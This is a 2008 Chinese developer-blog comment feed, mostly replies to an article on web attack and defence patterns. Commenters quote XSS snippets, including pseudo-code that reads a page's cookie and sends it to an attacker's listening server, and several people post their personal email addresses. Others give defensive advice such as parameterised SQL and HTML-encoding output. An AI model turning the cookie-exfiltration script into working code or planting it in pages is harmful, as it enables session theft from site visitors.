re: MySql与Java的时间类型 senngr 2008-09-24 20:01
nice~
一个对象的xml序列化和反序列化,搞的这么复杂,弄这么多图。
@楼上,性能根本不成问题
一篇好文,怎么被淹没了?
我就常常碰见搂主说的问题。其实什么东西都可以放到数据库解决,但是访问量以10万递增时,一个bit字段你都想省略掉。。
不过假如以xml为基准,省份城市,至少有上千个displayname和 value了,估计性能也不佳。
期盼早日看到实现代码。
@oldmoon
不错,是个好办法。不过我还是要按照我的思路来写一下,然后用到自己的WEB里面。:)
可以做一个公共的数据库,然后各相关项目统一读取。读取完之后各项目进行缓存。
还是放在数据库里比较好,用类似代码生成的方式生成一个里面有很多枚举类型的项目,各个需要用到的项目或者站点引用这个项目就可以了,数据更改后重新生成该项目。
好像和asp.net里面的buildprovider很像阿?能够提供设计时支持。
不至于这么大费周章吧。
不考虑效率的情况下,直接放在数据库里,然后读取就可以了。
想减少硬盘的读取的话,放在内存里缓存就可以了呀。
你这么处理的优点是什么呢?
re: 解决站点关键数据,状态数据,无须持久化数据的一些思路 zhengxionghua 2008-06-04 18:35
@xj
存到数据库里, 再编译就可以了
如果是多域名站点的话,如果修改了XML数据,每个站点的XML都得更新,也麻烦.
一般情况下,他们不能共用.
@lazylu
可以用枚举阿。用枚举是比较好。
不过枚举也会分布在代码不同的地方。
我现在在想能不能把这些枚举都集中到xml 文件里,然后再分编译时/运行时 去引用。
如果是编译时, 就依据xml 生成集中的枚举定义,然后放置到源代码中。
如果是运行时, 就用其他办法。但是Xml 可以重用, 解析部分的代码也可以重用。
只是一个思路。 :)
re: BS程序代码与安全与基本攻击/防御模式 cdboy 2008-06-04 09:12
文章很不错,收藏一个,以后的开发过程中就很要注意这些了
re: BS程序代码与安全与基本攻击/防御模式 Net 范 2008-06-03 14:07
如果SHELL能讲的更多点的话更好哈
re: BS程序代码与安全与基本攻击/防御模式 Net 范 2008-06-03 14:07
好文章!受教了
re: BS程序代码与安全与基本攻击/防御模式 HappyQQ 2008-06-02 23:59
呵呵,写得比较全,文章中所描述的应该说是目前常用的WEB功击方式吧
当然喽,还有很多较新的功击方式
一句话”病从口入,无论你的程序中哪个地方存在有输入,都存在有安全隐患!“
re: BS程序代码与安全与基本攻击/防御模式 Microshaoft 2008-06-02 23:33
shell 恐怖,上次我的程序也上传了,不知道怎么上传的,
楼主有什么好资料发给我学习下,防范方面的
zjw2004112@163.com
re: BS程序代码与安全与基本攻击/防御模式 BearOcean 2008-06-02 17:38
@王孟军!
您所指的详细资料是什么?
我的msn 是bearocean@hotmail.com
re: BS程序代码与安全与基本攻击/防御模式 www.chinacmsb.cn 2008-06-02 17:29
sql 注入值得关注!!!!
re: BS程序代码与安全与基本攻击/防御模式 qiuyun8m 2008-06-02 17:25
<script language=”javascript”>
alert(1);
</javascript>
有 没 有 详细点的 资料
我 的 MSN wmj2212@126.com
re: BS程序代码与安全与基本攻击/防御模式 BearOcean 2008-06-02 15:28
--引用--------------------------------------------------
234: <script language=”javascript”>
var strTargetMessage =window.cockie;
AjaxSend(“黑客掌握的服务器监听点”, strTargetMessage);
</javascript>
--------------------------------------------------------
.... -_-! 这个是伪码, 而且cnblogs 用的博客这种级别的转换都做好了。
re: BS程序代码与安全与基本攻击/防御模式 BearOcean 2008-06-02 15:27
--引用--------------------------------------------------
234: <script language=”javascript”>
alert("sdf");
</javascript>
--------------------------------------------------------
.....
re: BS程序代码与安全与基本攻击/防御模式 WCF群组博客 2008-06-02 14:28
@kiler
"典型的不看回帖而回帖。 "
re: BS程序代码与安全与基本攻击/防御模式 WCF群组博客 2008-06-02 14:27
@kiler
"典型的回帖不看帖。 "
你听谁说的啊,LZ讲SQL注入,我突然想来最近的网络SQL注入攻击,
就说一下,不可以啊
re: BS程序代码与安全与基本攻击/防御模式 Ryan Gene 2008-06-02 13:29
第一种注入,写sql的时候用参数,别拼,就可以防范了。。。
re: BS程序代码与安全与基本攻击/防御模式 kiler 2008-06-02 13:23
@WCF群组博客
典型的回帖不看帖。
--引用--------------------------------------------------
Microshaoft: SQL Inject:
关键是要使用参数化SQL
XSS:
关键是HTMLEncode输出,用户的输入
--------------------------------------------------------
平时我也是这么用的。
re: BS程序代码与安全与基本攻击/防御模式 hallywang 2008-06-02 13:16
不错,定lz
re: BS程序代码与安全与基本攻击/防御模式 WCF群组博客 2008-06-02 13:15
re: BS程序代码与安全与基本攻击/防御模式 datasky 2008-06-02 13:10
具体怎么做,还是有不了解的地方。
re: BS程序代码与安全与基本攻击/防御模式 rjsharp 2008-06-02 12:55
写的好,受用。
要是能写下 .NET下的具体防御措施就更好了。。。。。。。。。。。
re: BS程序代码与安全与基本攻击/防御模式 Microshaoft 2008-06-02 12:43
SQL Inject:
关键是要使用参数化SQL
XSS:
关键是HTMLEncode输出,用户的输入
re: BS程序代码与安全与基本攻击/防御模式 kiler 2008-06-02 12:39
总结的比较全面
re: BS程序代码与安全与基本攻击/防御模式 Freewind 2008-06-02 12:33
要是能下载就更好..
re: Personal Task 1.0使用说明 scotoma 2008-02-22 11:19
和我现在用DAILYPIM差不多的哦..呵呵......
任务管理是越来越重要了,我也有自己的软件进行管理,现在事情特别多,脑袋根本不好使的,楼主有些思路跟我还是很相似地。
我的日常记录工具是:
http://www.amnote.com
我们有时间可以交流交流,winbaogong21@msn.com
re: Personal Task 1.0使用说明 jeasonzhao 2008-02-01 14:59
框架有了,呵呵,不错,鼓励一下
--引用--------------------------------------------------
xiaoKxk: 知识管理中最好能加个查找功能。
可考虑添加任务查看密码功能,有可能任务是保密的,不能随意让别人看到。
--------------------------------------------------------
哈哈,正在做这一部分。
不过现在也正在做一个web版本的。考虑使用webservice 将网络版本的与PT能够通信。具体设计已经完成。
代码结构要大改。
web版本主要是架构方便,适用于工作室,有任务分派的逻辑。 不过web版本是Java的。
谢谢。